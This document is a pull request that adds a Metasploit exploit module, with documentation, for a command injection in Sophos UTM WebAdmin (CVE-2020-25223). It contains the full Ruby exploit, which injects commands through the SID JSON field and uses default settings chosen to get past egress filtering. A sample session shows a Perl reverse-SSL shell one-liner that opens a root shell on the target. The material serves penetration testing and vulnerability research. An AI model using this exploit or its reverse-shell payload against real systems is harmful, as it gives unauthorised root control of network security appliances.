### PR TITLE
Add Sophos UTM CVE-2020-25223 exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
@@ -10,6 +10,8 @@ Follow the [official instructions] from Sophos.
 
 Follow [Setup](#setup) and [Scenarios](#scenarios).
 
+## Options
+
 ## Scenarios
 
 ### Sophos UTM 9.510

--- a/documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
@@ -1,0 +1,74 @@
+## Vulnerable Application
+
+### Setup
+
+Follow the [official instructions] from Sophos.
+
+[official instructions]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/Installation.htm
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Scenarios
+
+### Sophos UTM 9.510
+
+```
+msf6 > use exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection
+[*] Using configured payload cmd/unix/reverse_perl_ssl
+msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > options
+
+Module options (exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      4444             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_perl_ssl):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  443              yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set rhosts 172.16.57.254
+rhosts => 172.16.57.254
+msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set lhost 172.16.57.1
+lhost => 172.16.57.1
+msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > set verbose true
+verbose => true
+msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run
+
+[+] perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"172.16.57.1:443",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
+[-] Handler failed to bind to 172.16.57.1:443
+[*] Started reverse SSL handler on 0.0.0.0:443
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Injecting command: sleep 8
+[*] Elapsed time: 8.052319 seconds
+[+] The target appears to be vulnerable. Successfully tested command injection.
+[*] Executing cmd/unix/reverse_perl_ssl (Unix Command)
+[*] Injecting command: perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"172.16.57.1:443",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
+[*] Command shell session 1 opened (172.16.57.1:443 -> 172.16.57.254:49901 ) at 2021-10-21 00:48:51 -0500
+
+whoami
+root
+```

--- a/documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
@@ -62,12 +62,12 @@ msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > run
 [-] Handler failed to bind to 172.16.57.1:443
 [*] Started reverse SSL handler on 0.0.0.0:443
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] Injecting command: sleep 8
-[*] Elapsed time: 8.052319 seconds
+[*] Injecting command: sleep 5
+[*] Elapsed time: 5.107014999957755 seconds
 [+] The target appears to be vulnerable. Successfully tested command injection.
 [*] Executing cmd/unix/reverse_perl_ssl (Unix Command)
 [*] Injecting command: perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"172.16.57.1:443",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
-[*] Command shell session 1 opened (172.16.57.1:443 -> 172.16.57.254:49901 ) at 2021-10-21 00:48:51 -0500
+[*] Command shell session 1 opened (172.16.57.1:443 -> 172.16.57.254:43275 ) at 2021-10-21 12:23:57 -0500
 
 whoami
 root

--- a/documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
+++ b/documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
@@ -2,9 +2,18 @@
 
 ### Setup
 
-Follow the [official instructions] from Sophos.
+Follow the [setup guide] from Sophos, in particular the [system requirements] and [installation instructions]. You can stop after that.
 
-[official instructions]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/Installation.htm
+1. Boot the ISO
+1. Follow the on-screen prompts
+1. Reboot
+1. Hax
+
+Tested against [`asg-9.510-5.1.iso`](#scenarios) (unpatched) and `asg-9.511-2.1.iso` (patched).
+
+[setup guide]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/Installation.htm
+[system requirements]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/InstallationSystemRequirements.htm
+[installation instructions]: https://docs.sophos.com/nsg/sophos-utm/utm/9.707/help/en-us/Content/utm/utmAdminGuide/InstallationInstructions.htm
 
 ## Verification Steps
 

--- a/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
+++ b/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
@@ -79,15 +79,25 @@ class MetasploitModule < Msf::Exploit::Remote
     ])
   end
 
-  def check
+  def stopwatch
     # https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/
     start = Process.clock_gettime(Process::CLOCK_MONOTONIC)
-    injected = inject_cmd("sleep #{sleep_time = rand(5..10)}", timeout: sleep_time + 1)
-    stop = Process.clock_gettime(Process::CLOCK_MONOTONIC)
+    ret = yield
+    elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - start
+
+    [ret, elapsed]
+  end
+
+  def check
+    sleep_time = rand(5..10)
+
+    injected, elapsed_time = stopwatch do
+      inject_cmd("sleep #{sleep_time}", timeout: sleep_time + 1)
+    end
 
     return CheckCode::Unknown if injected.nil?
 
-    vprint_status("Elapsed time: #{elapsed_time = stop - start} seconds")
+    vprint_status("Elapsed time: #{elapsed_time} seconds")
 
     # injected == false
     unless injected && elapsed_time > sleep_time

--- a/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
+++ b/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
@@ -109,6 +109,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    unless datastore['LPORT'] == 443
+      print_warning('LPORT=443 is recommended to bypass egress filtering')
+    end
+
     print_status("Executing #{payload_instance.refname} (#{target.name})")
 
     case target['Type']

--- a/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
+++ b/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
@@ -80,9 +80,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    start = Time.now
+    # https://blog.dnsimple.com/2018/03/elapsed-time-with-ruby-the-right-way/
+    start = Process.clock_gettime(Process::CLOCK_MONOTONIC)
     injected = inject_cmd("sleep #{sleep_time = rand(5..10)}", timeout: sleep_time + 1)
-    stop = Time.now
+    stop = Process.clock_gettime(Process::CLOCK_MONOTONIC)
 
     return CheckCode::Unknown if injected.nil?
 

--- a/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
+++ b/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
@@ -1,0 +1,141 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sophos UTM WebAdmin SID Command Injection',
+        'Description' => %q{
+          This module exploits an SID-based command injection in Sophos UTM's
+          WebAdmin interface to execute shell commands as the root user.
+        },
+        'Author' => [
+          # Discovered by unknown researcher(s)
+          'Justin Kennedy', # Analysis and PoC
+          'wvu' # Supplementary analysis and exploit
+        ],
+        'References' => [
+          ['CVE', '2020-25223'],
+          ['URL', 'https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce'],
+          ['URL', 'https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223'],
+          ['URL', 'https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a']
+        ],
+        'DisclosureDate' => '2020-09-18',
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 4444,
+          'LPORT' => 443, # XXX: Bypass Sophos UTM's egress filtering
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [FIRST_ATTEMPT_FAIL],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/'])
+    ])
+  end
+
+  def check
+    start = Time.now
+    injected = inject_cmd("sleep #{sleep_time = rand(5..10)}", timeout: sleep_time + 1)
+    stop = Time.now
+
+    return CheckCode::Unknown if injected.nil?
+
+    vprint_status("Elapsed time: #{elapsed_time = stop - start} seconds")
+
+    # injected == false
+    unless injected && elapsed_time > sleep_time
+      return CheckCode::Safe('Failed to test command injection.')
+    end
+
+    # injected == true
+    CheckCode::Appears('Successfully tested command injection.')
+  end
+
+  def exploit
+    print_status("Executing #{payload_instance.refname} (#{target.name})")
+
+    case target['Type']
+    when :cmd
+      execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    # nil or true on success
+    if inject_cmd(cmd) == false
+      fail_with(Failure::PayloadFailed, "Failed to execute command: #{cmd}")
+    end
+  end
+
+  def inject_cmd(cmd, timeout: 3.5)
+    vprint_status("Injecting command: #{cmd}")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'var'),
+      'ctype' => 'application/json; charset=UTF-8', # NOTE: charset is required
+      'data' => {
+        'SID' => "|#{cmd}|"
+      }.to_json
+    }, timeout)
+
+    return unless res
+    return false unless res.code == 200 && res.body.include?(alert_msg)
+
+    true
+  end
+
+  def alert_msg
+    # {"RID":"","objs":[{"js":"json_abort(true);"},{"alert":"Backend connection failed, please click Shift-Reload to try again."}]}
+    'Backend connection failed, please click Shift-Reload to try again.'
+  end
+
+end

--- a/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
+++ b/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
     sleep_time = rand(5..10)
 
     injected, elapsed_time = stopwatch do
-      inject_cmd("sleep #{sleep_time}", timeout: sleep_time + 1)
+      inject_cmd("sleep #{sleep_time}", timeout: sleep_time * 1.5)
     end
 
     return CheckCode::Unknown if injected.nil?

--- a/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
+++ b/modules/exploits/linux/http/sophos_utm_webadmin_sid_cmd_injection.rb
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, 'var'),
       'ctype' => 'application/json; charset=UTF-8', # NOTE: charset is required
       'data' => {
-        'SID' => "|#{cmd}|"
+        'SID' => "|#{cmd}|" # https://perldoc.perl.org/functions/open#Opening-a-filehandle-into-a-command
       }.to_json
     }, timeout)
 


### PR DESCRIPTION
```
msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) > info

       Name: Sophos UTM WebAdmin SID Command Injection
     Module: exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2020-09-18

Provided by:
  Justin Kennedy
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 first-attempt-fail

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      4444             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an SID-based command injection in Sophos UTM's
  WebAdmin interface to execute shell commands as the root user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2020-25223
  https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce
  https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
  https://attackerkb.com/assessments/d6e0dff3-dd46-4f19-831d-c3f3f2fa972a

msf6 exploit(linux/http/sophos_utm_webadmin_sid_cmd_injection) >
```